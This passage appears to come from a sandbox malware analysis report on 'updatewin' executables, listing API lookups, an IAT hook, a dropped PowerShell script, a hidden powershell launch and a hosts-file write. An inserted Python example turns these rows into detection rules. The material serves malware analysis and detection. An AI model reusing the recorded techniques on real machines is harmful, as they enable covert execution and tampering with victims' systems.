Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x76c3196e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-05-13 17:22:59 (UTC) True 1
Fn
Get Time type = Ticks, time = 158793 True 1
Fn
Get Time type = Performance Ctr, time = 22020158348 True 1
Fn
Get Time type = Ticks, time = 159011 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = System Time, time = 2019-05-13 17:23:00 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 22164934135 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Process #8: updatewin1.exe
Information Value
ID #8
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe" --Admin
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\
Monitor Start Time: 00:01:39, Reason: Child Process
Unmonitor End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration 00:03:04
OS Process Information
Information Value
PID 0x6d0
Parent PID 0x8f0 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x534
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x002D5000 0x002D5FFF Marked Executable - 32-bit - False False
Hook Information
Type: IAT
Installer: private_0x00000000002c0000:+0x1679d
Target: 104. entry of updatewin1.exe (4 bytes)
Information: kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x00000000008e0000:+0x68f6f6
Dropped Files
Filename: C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1
File Size: 49 bytes
MD5: f972c62f986b5ed49ad7713d93bf6c9f
SHA1: 4e157002bdb97e9526ab97bfafbf7c67e1d1efbf
SHA256: b47f85974a7ec2fd5aa82d52f08eb0f6cea7e596a98dd29e8b85b5c37beca0a8
SSDeep: 3:uIHeGAFcX5wTnl:/eGgHTl
YARA Match: False
Host Behavior
File (8)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 size = 49 True 1
Fn
Process (1)
Operation Process Additional Information Success Count Logfile
Create powershell os_pid = 0x86c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
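Read together, the File and Process tables for updatewin1.exe show the sequence a detection rule keys on: a 49-byte script.ps1 is created and written under AppData\Local, then powershell is started with show_window = SW_HIDE. The script's content is not on this page, so a rule has to work from the behaviour alone. The following is an added example, not VMRay's code: it parses rows in the format of these tables (SAMPLE_ROWS are copied from this report; the row grammar and the rule set are this example's own assumptions) and applies three rules, a write to the hosts file, a hidden powershell launch, and a dropped .ps1 followed by a hidden powershell launch in the same process.

```python
"""Detection rules over sandbox behaviour rows in the format of this report.

Added example, not VMRay's code. SAMPLE_ROWS are copied from the File and
Process tables of this report; the row grammar and the rules are this
example's own assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

OPS = ("Get Filename", "Get Address", "Get Handle", "Get Info",
       "Create", "Write", "Open", "Load")
TAIL_RE = re.compile(r"^(?P<rest>.*) (?P<ok>True|False) (?P<count>\d+)$")
KV_START_RE = re.compile(r"\s(\w+ = )")  # first 'key = ' after the target column


@dataclass
class Event:
    op: str
    target: str
    attrs: Dict[str, str] = field(default_factory=dict)
    success: bool = True
    count: int = 1


def parse_attrs(kv: str) -> Dict[str, str]:
    """Parse 'k = v, v2, k2 = v3'; a chunk without ' = ' continues the
    previous value (flag lists such as GENERIC_WRITE, GENERIC_READ)."""
    attrs: Dict[str, str] = {}
    key = None
    for chunk in kv.split(", "):
        if " = " in chunk:
            key, val = chunk.split(" = ", 1)
            attrs[key] = val
        elif key is not None:
            attrs[key] += ", " + chunk
    return attrs


def parse_row(row: str) -> Event:
    """Split 'Op target key = value, ... True|False N' into an Event."""
    op = next((o for o in OPS if row.startswith(o + " ")), None)
    if op is None:
        raise ValueError(f"unknown operation: {row!r}")
    m = TAIL_RE.match(row[len(op) + 1:])
    if m is None:
        raise ValueError(f"missing Success/Count columns: {row!r}")
    rest = m.group("rest")
    kv = KV_START_RE.search(rest)
    target = rest[:kv.start()] if kv else rest
    attrs = parse_attrs(rest[kv.start() + 1:]) if kv else {}
    if target.endswith(" -"):  # '-' stands for an empty Additional Information cell
        target = target[:-2]
    return Event(op, target, attrs, m.group("ok") == "True", int(m.group("count")))


Row = Tuple[str, str, str]        # (process image, table section, row text)
Finding = Tuple[str, str, str]    # (rule, process image, detail)


def run_rules(rows: List[Row]) -> List[Finding]:
    """Rows are assumed to be in execution order within each process,
    as the report lists them (file drop before the process launch)."""
    by_proc: Dict[str, List[Tuple[str, Event]]] = {}
    for proc, section, row in rows:
        by_proc.setdefault(proc, []).append((section, parse_row(row)))
    findings: List[Finding] = []
    for proc, events in by_proc.items():
        dropped_scripts: List[str] = []
        for section, ev in events:
            if not ev.success:
                continue
            low = ev.target.lower()
            if section == "File" and ev.op == "Write" and low.endswith(r"\drivers\etc\hosts"):
                findings.append(("hosts_file_write", proc,
                                 f"{ev.attrs.get('size', '?')} bytes written to {ev.target}"))
            elif section == "File" and ev.op in ("Create", "Write") and low.endswith(".ps1"):
                if ev.target not in dropped_scripts:
                    dropped_scripts.append(ev.target)
            elif (section == "Process" and ev.op == "Create" and low.startswith("powershell")
                  and ev.attrs.get("show_window") == "SW_HIDE"):
                detail = f"hidden window, pid {ev.attrs.get('os_pid', '?')}"
                if dropped_scripts:
                    findings.append(("dropped_ps1_hidden_powershell", proc,
                                     detail + f", after dropping {dropped_scripts[-1]}"))
                else:
                    findings.append(("hidden_powershell", proc, detail))
    return findings


# Rows copied verbatim from this report (process image, section, row).
SAMPLE_ROWS: List[Row] = [
    ("updatewin2.exe", "File", r"Create C:\Windows\System32\drivers\etc\hosts desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1"),
    ("updatewin2.exe", "File", r"Write C:\Windows\System32\drivers\etc\hosts size = 7286 True 1"),
    ("updatewin1.exe", "File", r"Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1"),
    ("updatewin1.exe", "File", r"Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 size = 49 True 1"),
    ("updatewin1.exe", "Process", r"Create powershell os_pid = 0x86c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1"),
    ("updatewin.exe", "File", r"Open STD_INPUT_HANDLE - True 2"),
]

if __name__ == "__main__":
    for rule, proc, detail in run_rules(SAMPLE_ROWS):
        print(f"[{rule}] {proc}: {detail}")
```

On the rows above this yields two findings: hosts_file_write for updatewin2.exe and dropped_ps1_hidden_powershell for updatewin1.exe. The attribute parser keeps comma-separated flag lists intact (desired_access stays "GENERIC_WRITE, GENERIC_READ"), and the target column is cut at the first "key = " token, which tolerates the space in the sandbox user name. Failed operations (Success = False) are skipped so that a blocked write does not trigger the hosts rule.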
Module (151)
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load kernel32.dll - False 1
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-05-13 17:22:59 (UTC) True 1
Fn
Get Time type = Ticks, time = 158777 True 1
Fn
Get Time type = Performance Ctr, time = 22030380328 True 1
Fn
Get Time type = Ticks, time = 159074 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = System Time, time = 2019-05-13 17:23:00 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 22195645221 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
